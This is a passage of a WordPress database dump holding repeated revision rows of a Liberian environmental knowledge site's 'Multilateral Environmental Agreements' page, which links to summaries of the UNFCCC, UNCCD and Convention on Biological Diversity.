href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\"><img width=\"1000\" height=\"554\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc.jpg\" alt=\"United Nations Framework Convention on Climate Change\" title=\"United Nations Framework Convention on Climate Change\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc.jpg 1000w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc-768x425.jpg 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" /></a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\">United Nations Framework Convention on Climate Change</a>The United Nations Framework Convention on Climate Change (UNFCCC) entered into force on 21 March 1994. Today, it has near-universal...<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\">Read More</a>\n					<a href=\"https://ekmsliberia.info/resource-category/mea/unccd/\">UNCCD</a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\"><img width=\"1000\" height=\"554\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd.jpg\" alt=\"United Nations Convention to Combat Desertification\" title=\"United Nations Convention to Combat Desertification\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd.jpg 1000w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-768x425.jpg 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" /></a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\">United Nations Convention to Combat Desertification</a>Established in 1994, the United Nations Convention to Combat Desertification (UNCCD) is the sole legally binding international agreement linking environment...<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\">Read More</a>\n					<a href=\"https://ekmsliberia.info/resource-category/mea/uncbd/\">UNCBD</a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\"><img width=\"1000\" height=\"554\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1.jpg\" alt=\"United Nations Convention on Biological Diversity\" title=\"United Nations Convention on Biological Diversity\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1.jpg 1000w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-768x425.jpg 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" /></a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\">United Nations Convention on Biological Diversity</a>The Convention on Biological Diversity – Signed by 150 government leaders at the 1992 Rio Earth Summit, the Convention on...<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\">Read More</a>','Multilateral Environmental Agreements','','inherit','closed','closed','','84-revision-v1','','','2019-11-12 02:10:08','2019-11-12 02:10:08','',84,'https://ekmsliberia.info/84-revision-v1/',0,'revision','',0),(1889,1,'2019-11-12 02:14:30','2019-11-12 02:14:30','<h2>Conventions & Protocols</h2>\n					<a href=\"https://ekmsliberia.info/resource-category/mea/unfccc/\">UNFCCC</a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\"><img width=\"1000\" height=\"554\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc.jpg\" alt=\"United Nations Framework Convention on Climate Change\" title=\"United Nations Framework Convention on Climate Change\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc.jpg 1000w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc-768x425.jpg 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" /></a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\">United Nations Framework Convention on Climate Change</a>The United Nations Framework Convention on Climate Change (UNFCCC) entered into force on 21 March 1994. Today, it has near-universal...<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\">Read More</a>\n					<a href=\"https://ekmsliberia.info/resource-category/mea/unccd/\">UNCCD</a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\"><img width=\"1000\" height=\"554\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd.jpg\" alt=\"United Nations Convention to Combat Desertification\" title=\"United Nations Convention to Combat Desertification\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd.jpg 1000w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-768x425.jpg 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" /></a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\">United Nations Convention to Combat Desertification</a>Established in 1994, the United Nations Convention to Combat Desertification (UNCCD) is the sole legally binding international agreement linking environment...<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\">Read More</a>\n					<a href=\"https://ekmsliberia.info/resource-category/mea/uncbd/\">UNCBD</a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\"><img width=\"1000\" height=\"554\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1.jpg\" alt=\"United Nations Convention on Biological Diversity\" title=\"United Nations Convention on Biological Diversity\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1.jpg 1000w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-768x425.jpg 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" /></a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\">United Nations Convention on Biological Diversity</a>The Convention on Biological Diversity – Signed by 150 government leaders at the 1992 Rio Earth Summit, the Convention on...<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\">Read More</a>','Multilateral Environmental Agreements','','inherit','closed','closed','','84-revision-v1','','','2019-11-12 02:14:30','2019-11-12 02:14:30','',84,'https://ekmsliberia.info/84-revision-v1/',0,'revision','',0);
INSERT INTO `wp_posts` VALUES (1890,1,'2019-11-12 02:15:12','2019-11-12 02:15:12','<h2>Conventions & Protocols</h2>\n					<a href=\"https://ekmsliberia.info/resource-category/mea/unfccc/\">UNFCCC</a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\"><img width=\"1000\" height=\"554\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc.jpg\" alt=\"United Nations Framework Convention on Climate Change\" title=\"United Nations Framework Convention on Climate Change\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc.jpg 1000w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc-768x425.jpg 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" /></a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\">United Nations Framework Convention on Climate Change</a>The United Nations Framework Convention on Climate Change (UNFCCC) entered into force on 21 March 1994. Today, it has near-universal...<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\">Read More</a>\n					<a href=\"https://ekmsliberia.info/resource-category/mea/unccd/\">UNCCD</a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\"><img width=\"1000\" height=\"554\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd.jpg\" alt=\"United Nations Convention to Combat Desertification\" title=\"United Nations Convention to Combat Desertification\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd.jpg 1000w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-768x425.jpg 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" /></a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\">United Nations Convention to Combat Desertification</a>Established in 1994, the United Nations Convention to Combat Desertification (UNCCD) is the sole legally binding international agreement linking environment...<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\">Read More</a>\n					<a href=\"https://ekmsliberia.info/resource-category/mea/uncbd/\">UNCBD</a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\"><img width=\"1000\" height=\"554\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1.jpg\" alt=\"United Nations Convention on Biological Diversity\" title=\"United Nations Convention on Biological Diversity\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1.jpg 1000w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-768x425.jpg 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" /></a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\">United Nations Convention on Biological Diversity</a>The Convention on Biological Diversity – Signed by 150 government leaders at the 1992 Rio Earth Summit, the Convention on...<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\">Read More</a>','Multilateral Environmental Agreements','','inherit','closed','closed','','84-revision-v1','','','2019-11-12 02:15:12','2019-11-12 02:15:12','',84,'https://ekmsliberia.info/84-revision-v1/',0,'revision','',0),(1891,1,'2019-11-12 02:16:36','2019-11-12 02:16:36','<h2>Conventions & Protocols</h2>\n					<a href=\"https://ekmsliberia.info/resource-category/mea/unfccc/\">UNFCCC</a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\"><img width=\"1000\" height=\"554\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc.jpg\" alt=\"United Nations Framework Convention on Climate Change\" title=\"United Nations Framework Convention on Climate Change\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc.jpg 1000w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc-768x425.jpg 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" /></a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\">United Nations Framework Convention on Climate Change</a>The United Nations Framework Convention on Climate Change (UNFCCC) entered into force on 21 March 1994. Today, it has near-universal...<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\">Read More</a>\n					<a href=\"https://ekmsliberia.info/resource-category/mea/unccd/\">UNCCD</a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\"><img width=\"1000\" height=\"554\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd.jpg\" alt=\"United Nations Convention to Combat Desertification\" title=\"United Nations Convention to Combat Desertification\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd.jpg 1000w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-768x425.jpg 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" /></a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\">United Nations Convention to Combat Desertification</a>Established in 1994, the United Nations Convention to Combat Desertification (UNCCD) is the sole legally binding international agreement linking environment...<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\">Read More</a>\n					<a href=\"https://ekmsliberia.info/resource-category/mea/uncbd/\">UNCBD</a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\"><img width=\"1000\" height=\"554\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1.jpg\" alt=\"United Nations Convention on Biological Diversity\" title=\"United Nations Convention on Biological Diversity\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1.jpg 1000w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-768x425.jpg 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" /></a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\">United Nations Convention on Biological Diversity</a>The Convention on Biological Diversity – Signed by 150 government leaders at the 1992 Rio Earth Summit, the Convention on...<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\">Read More</a>','Multilateral Environmental Agreements','','inherit','closed','closed','','84-revision-v1','','','2019-11-12 02:16:36','2019-11-12 02:16:36','',84,'https://ekmsliberia.info/84-revision-v1/',0,'revision','',0),(1892,1,'2019-11-12 02:23:07','2019-11-12 02:23:07','<h2>Conventions & Protocols</h2>\n					<a href=\"https://ekmsliberia.info/resource-category/mea/unfccc/\">UNFCCC</a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\"><img width=\"1000\" height=\"554\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc.jpg\" alt=\"United Nations Framework Convention on Climate Change\" title=\"United Nations Framework Convention on Climate Change\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc.jpg 1000w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc-768x425.jpg 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" /></a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\">United Nations Framework Convention on Climate Change</a>The United Nations Framework Convention on Climate Change (UNFCCC) entered into force on 21 March 1994. Today, it has near-universal...<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\">Read More</a>\n					<a href=\"https://ekmsliberia.info/resource-category/mea/unccd/\">UNCCD</a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\"><img width=\"1000\" height=\"554\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd.jpg\" alt=\"United Nations Convention to Combat Desertification\" title=\"United Nations Convention to Combat Desertification\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd.jpg 1000w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-768x425.jpg 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" /></a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\">United Nations Convention to Combat Desertification</a>Established in 1994, the United Nations Convention to Combat Desertification (UNCCD) is the sole legally binding international agreement linking environment...<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\">Read More</a>\n					<a href=\"https://ekmsliberia.info/resource-category/mea/uncbd/\">UNCBD</a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\"><img width=\"1000\" height=\"554\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1.jpg\" alt=\"United Nations Convention on Biological Diversity\" title=\"United Nations Convention on Biological Diversity\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1.jpg 1000w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-768x425.jpg 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" /></a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\">United Nations Convention on Biological Diversity</a>The Convention on Biological Diversity – Signed by 150 government leaders at the 1992 Rio Earth Summit, the Convention on...<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\">Read More</a>','Multilateral Environmental Agreements','','inherit','closed','closed','','84-revision-v1','','','2019-11-12 02:23:07','2019-11-12 02:23:07','',84,'https://ekmsliberia.info/84-revision-v1/',0,'revision','',0),(1893,1,'2019-11-12 02:25:42','2019-11-12 02:25:42','<h2>Conventions & Protocols</h2>\n					<a href=\"https://ekmsliberia.info/resource-category/mea/unfccc/\">UNFCCC</a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\"><img width=\"1000\" height=\"554\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc.jpg\" alt=\"United Nations Framework Convention on Climate Change\" title=\"United Nations Framework Convention on Climate Change\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc.jpg 1000w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc-768x425.jpg 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" /></a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\">United Nations Framework Convention on Climate Change</a>The United Nations Framework Convention on Climate Change (UNFCCC) entered into force on 21 March 1994. Today, it has near-universal...<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\">Read More</a>\n					<a href=\"https://ekmsliberia.info/resource-category/mea/unccd/\">UNCCD</a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\"><img width=\"1000\" height=\"554\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd.jpg\" alt=\"United Nations Convention to Combat Desertification\" title=\"United Nations Convention to Combat Desertification\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd.jpg 1000w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-768x425.jpg 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" /></a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\">United Nations Convention to Combat Desertification</a>Established in 1994, the United Nations Convention to Combat Desertification (UNCCD) is the sole legally binding international agreement linking environment...<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\">Read More</a>\n					<a href=\"https://ekmsliberia.info/resource-category/mea/uncbd/\">UNCBD</a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\"><img width=\"1000\" height=\"554\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1.jpg\" alt=\"United Nations Convention on Biological Diversity\" title=\"United Nations Convention on Biological Diversity\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1.jpg 1000w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-768x425.jpg 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" /></a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\">United Nations Convention on Biological Diversity</a>The Convention on Biological Diversity – Signed by 150 government leaders at the 1992 Rio Earth Summit, the Convention on...<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\">Read More</a>','Multilateral Environmental Agreements','','inherit','closed','closed','','84-revision-v1','','','2019-11-12 02:25:42','2019-11-12 02:25:42','',84,'https://ekmsliberia.info/84-revision-v1/',0,'revision','',0),(1899,1,'2019-11-12 02:42:18','2019-11-12 02:42:18','<h2>Conventions & Protocols</h2>\n					<a href=\"https://ekmsliberia.info/resource-category/mea/unfccc/\">UNFCCC</a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\"><img width=\"1000\" height=\"554\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc.jpg\" alt=\"United Nations Framework Convention on Climate Change\" title=\"United Nations Framework Convention on Climate Change\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc.jpg 1000w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc-768x425.jpg 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" /></a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\">United Nations Framework Convention on Climate Change</a>The United Nations Framework Convention on Climate Change (UNFCCC) entered into force on 21 March 1994. Today, it has near-universal...<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\">Read More</a>\n					<a href=\"https://ekmsliberia.info/resource-category/mea/unccd/\">UNCCD</a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\"><img width=\"1000\" height=\"554\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd.jpg\" alt=\"United Nations Convention to Combat Desertification\" title=\"United Nations Convention to Combat Desertification\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd.jpg 1000w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-768x425.jpg 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" /></a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\">United Nations Convention to Combat Desertification</a>Established in 1994, the United Nations Convention to Combat Desertification (UNCCD) is the sole legally binding international agreement linking environment...<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\">Read More</a>\n					<a href=\"https://ekmsliberia.info/resource-category/mea/uncbd/\">UNCBD</a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\"><img width=\"1000\" height=\"554\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1.jpg\" alt=\"United Nations Convention on Biological Diversity\" title=\"United Nations Convention on Biological Diversity\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1.jpg 1000w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-768x425.jpg 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" /></a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\">United Nations Convention on Biological Diversity</a>The Convention on Biological Diversity – Signed by 150 government leaders at the 1992 Rio Earth Summit, the Convention on...<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\">Read More</a>','Multilateral Environmental Agreements','','inherit','closed','closed','','84-revision-v1','','','2019-11-12 02:42:18','2019-11-12 02:42:18','',84,'https://ekmsliberia.info/84-revision-v1/',0,'revision','',0),(1900,1,'2019-11-12 02:44:04','2019-11-12 02:44:04','<h2>Conventions & Protocols</h2>\n					<a href=\"https://ekmsliberia.info/resource-category/mea/unfccc/\">UNFCCC</a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\"><img width=\"1000\" height=\"554\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc.jpg\" alt=\"United Nations Framework Convention on Climate Change\" title=\"United Nations Framework Convention on Climate Change\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc.jpg 1000w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc-768x425.jpg 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" /></a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\">United Nations Framework Convention on Climate Change</a>The United Nations Framework Convention on Climate Change (UNFCCC) entered into force on 21 March 1994. Today, it has near-universal...<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\">Read More</a>\n					<a href=\"https://ekmsliberia.info/resource-category/mea/unccd/\">UNCCD</a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\"><img width=\"1000\" height=\"554\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd.jpg\" alt=\"United Nations Convention to Combat Desertification\" title=\"United Nations Convention to Combat Desertification\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd.jpg 1000w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-768x425.jpg 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" /></a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\">United Nations Convention to Combat Desertification</a>Established in 1994, the United Nations Convention to Combat Desertification (UNCCD) is the sole legally binding international agreement linking environment...<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\">Read More</a>\n					<a href=\"https://ekmsliberia.info/resource-category/mea/uncbd/\">UNCBD</a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\"><img width=\"1000\" height=\"554\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1.jpg\" alt=\"United Nations Convention on Biological Diversity\" title=\"United Nations Convention on Biological Diversity\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1.jpg 1000w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-768x425.jpg 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" /></a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\">United Nations Convention on Biological Diversity</a>The Convention on Biological Diversity – Signed by 150 government leaders at the 1992 Rio Earth Summit, the Convention on...<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\">Read More</a>','Multilateral Environmental Agreements','','inherit','closed','closed','','84-revision-v1','','','2019-11-12 02:44:04','2019-11-12 02:44:04','',84,'https://ekmsliberia.info/84-revision-v1/',0,'revision','',0),(1901,1,'2019-11-12 02:46:45','2019-11-12 02:46:45','<h2>Conventions & Protocols</h2>\n					<a href=\"https://ekmsliberia.info/resource-category/mea/unfccc/\">UNFCCC</a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\"><img width=\"1000\" height=\"554\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc.jpg\" alt=\"United Nations Framework Convention on Climate Change\" title=\"United Nations Framework Convention on Climate Change\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc.jpg 1000w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc-768x425.jpg 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" /></a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\">United Nations Framework Convention on Climate Change</a>The United Nations Framework Convention on Climate Change (UNFCCC) entered into force on 21 March 1994. Today, it has near-universal...<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\">Read More</a>\n					<a href=\"https://ekmsliberia.info/resource-category/mea/unccd/\">UNCCD</a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\"><img width=\"1000\" height=\"554\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd.jpg\" alt=\"United Nations Convention to Combat Desertification\" title=\"United Nations Convention to Combat Desertification\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd.jpg 1000w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-768x425.jpg 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" /></a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\">United Nations Convention to Combat Desertification</a>Established in 1994, the United Nations Convention to Combat Desertification (UNCCD) is the sole legally binding international agreement linking environment...<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\">Read More</a>\n					<a href=\"https://ekmsliberia.info/resource-category/mea/uncbd/\">UNCBD</a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\"><img width=\"1000\" height=\"554\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1.jpg\" alt=\"United Nations Convention on Biological Diversity\" title=\"United Nations Convention on Biological Diversity\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1.jpg 1000w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-768x425.jpg 768w\" 